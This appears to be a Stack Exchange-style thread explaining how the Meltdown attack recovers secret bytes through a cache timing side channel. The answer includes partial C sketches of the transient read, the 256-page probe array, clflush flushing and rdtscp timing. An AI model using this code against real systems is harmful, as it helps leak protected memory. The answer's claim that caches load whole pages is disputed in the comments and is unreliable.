
NOTE: I know there are similar questions out there, namely this one, but that answer is just an extraction from the original paper, which doesn't clarify the attack. Additionally, I can see from the answers that there is some meaningful discussion going on, so I will still post this question until a better duplicate suggestion appears.

In some literature, I have seen vague descriptions like:

the Meltdown vulnerability uses the cache as a side channel to leak the information found during step two. During the attack, in order to use the cache as a side channel, the attacker must generate a significant number of cache misses for every cache hit, as the timing differences between a cache miss and a cache hit are used to gather the data.

Can somebody describe how exactly the sensitive data the attacker wants to know is determined byte by byte, and how the page size (4096) plays a crucial part in this?

Sajuuk

1 Answer


There's an XKCD for that!

A page is the smallest unit of data for memory management in a virtual memory operating system. That means when data is moved in and out of caches it is moved in chunks of at least 1 page.

In the simplest case, let's assume the attacker is interested in a single byte of memory. Let's say this byte is at address 0. The attacker sets up an array which is 256 pages long. Let's call this array "page_array". They then trick the processor into performing the following (a rough C sketch of these steps appears after the list) -

1. load the byte at address 0 into register[x]
2. load the byte at page_array[PAGE_SIZE * register[x]] into register[y]
   // PAGE_SIZE would usually be 4096
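
To make this concrete, here is a rough, hypothetical C sketch of the transient sequence. The names (secret_addr, page_array, transient_access) are illustrative, and a real exploit also has to suppress or survive the fault from step 1 (e.g. with a signal handler or TSX), which is omitted here:

    #define PAGE_SIZE 4096
    unsigned char page_array[256 * PAGE_SIZE];   /* one page per possible byte value */

    void transient_access(const unsigned char *secret_addr)
    {
        /* Step 1: this read is not permitted and will fault, but it may
         * still execute transiently before the fault is delivered.      */
        unsigned char value = *secret_addr;

        /* Step 2: the dependent load pulls one particular page of
         * page_array into the cache, indexed by the secret value.       */
        volatile unsigned char sink = page_array[value * PAGE_SIZE];
        (void)sink;
    }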

The CPU then realizes its mistake and undoes all of the above. But meanwhile, the page containing page_array[PAGE_SIZE * register[x]] has been fetched and is sitting in the cache, i.e. if the value were 1 you would expect -

  • bytes at page_array[0 to 4095] to be unlikely to be in the cache.
  • bytes at page_array[4096 to 8191] to be likely to be in the cache.
  • bytes at page_array[8192+] to be unlikely to be in the cache.

By timing accesses to page_array[PAGE_SIZE * i] for i in the range 0 to 255, the pages which load fastest are almost certainly in the cache. The difference is large enough that, by selecting an appropriate threshold, you should be able to somewhat reliably discern between a hit and a miss.
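
As a hedged sketch of that timing step (assuming an x86 machine where the rdtscp timestamp counter is available through <x86intrin.h>, and reusing the hypothetical page_array from above; the threshold has to be calibrated on the target machine):

    #include <stdint.h>
    #include <x86intrin.h>               /* __rdtscp */

    #define PAGE_SIZE 4096
    extern unsigned char page_array[256 * PAGE_SIZE];   /* probe array from the sketch above */

    /* Time a single load; anything below the calibrated threshold is
     * treated as a cache hit.                                           */
    static uint64_t time_access(volatile unsigned char *addr)
    {
        unsigned int aux;
        uint64_t start = __rdtscp(&aux);
        (void)*addr;
        uint64_t end = __rdtscp(&aux);
        return end - start;
    }

    /* Probe all 256 pages; the one that loads fast reveals the byte.    */
    int recover_byte(uint64_t threshold)
    {
        for (int i = 0; i < 256; i++) {
            if (time_access(&page_array[i * PAGE_SIZE]) < threshold)
                return i;
        }
        return -1;   /* no clear hit this round */
    }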

By repeating the same process multiple times, and by taking special steps to flush the array out of the cache before indexing into it, a malicious actor can reach a point where they have the correct value with a very high statistical probability.
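
A hedged sketch of the flushing and repetition (again x86-specific, using the clflush intrinsic from <x86intrin.h> and the hypothetical recover_byte() from the previous sketch):

    #include <stdint.h>
    #include <x86intrin.h>               /* _mm_clflush, _mm_mfence */

    #define PAGE_SIZE 4096
    extern unsigned char page_array[256 * PAGE_SIZE];
    int recover_byte(uint64_t threshold);            /* from the sketch above */

    /* Evict every probe page so that only the transient access can
     * bring one of them back into the cache.                            */
    static void flush_probe_array(void)
    {
        for (int i = 0; i < 256; i++)
            _mm_clflush(&page_array[i * PAGE_SIZE]);
        _mm_mfence();                    /* wait for the flushes to finish */
    }

    /* Run many rounds and take the most frequent guess.                 */
    int recover_byte_reliably(int rounds, uint64_t threshold)
    {
        int votes[256] = {0};
        for (int r = 0; r < rounds; r++) {
            flush_probe_array();
            /* ... trigger the faulting/transient access here ... */
            int guess = recover_byte(threshold);
            if (guess >= 0)
                votes[guess]++;
        }
        int best = 0;
        for (int i = 1; i < 256; i++)
            if (votes[i] > votes[best])
                best = i;
        return best;
    }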

Hector
  • Are you sure you mean pages and not just cache lines? – Andy Jan 15 '18 at 16:23
  • @Andy - The papers all state pages. I'd have to reload the Flush+Reload paper to be certain as to why. – Hector Jan 15 '18 at 16:50
  • Well, I looked through the paper, and I think the author means cache lines. I quote: "Step 2 A transient instruction accesses a cache line based on the secret content of the register.". The problem here - your description, while nice and very readable, makes an impression that the whole page (4k) is loaded into cache by each cache miss instead of a cache line (64 bytes), and this is not true. – Andy Jan 15 '18 at 17:37
  • @Andy - The Meltdown paper definitely references 4096 byte pages as opposed to cache lines (which on every architecture I've seen would be smaller than this). So as it stands I still believe they are referencing pages and need to re-read the papers to work out why. – Hector Jan 15 '18 at 22:23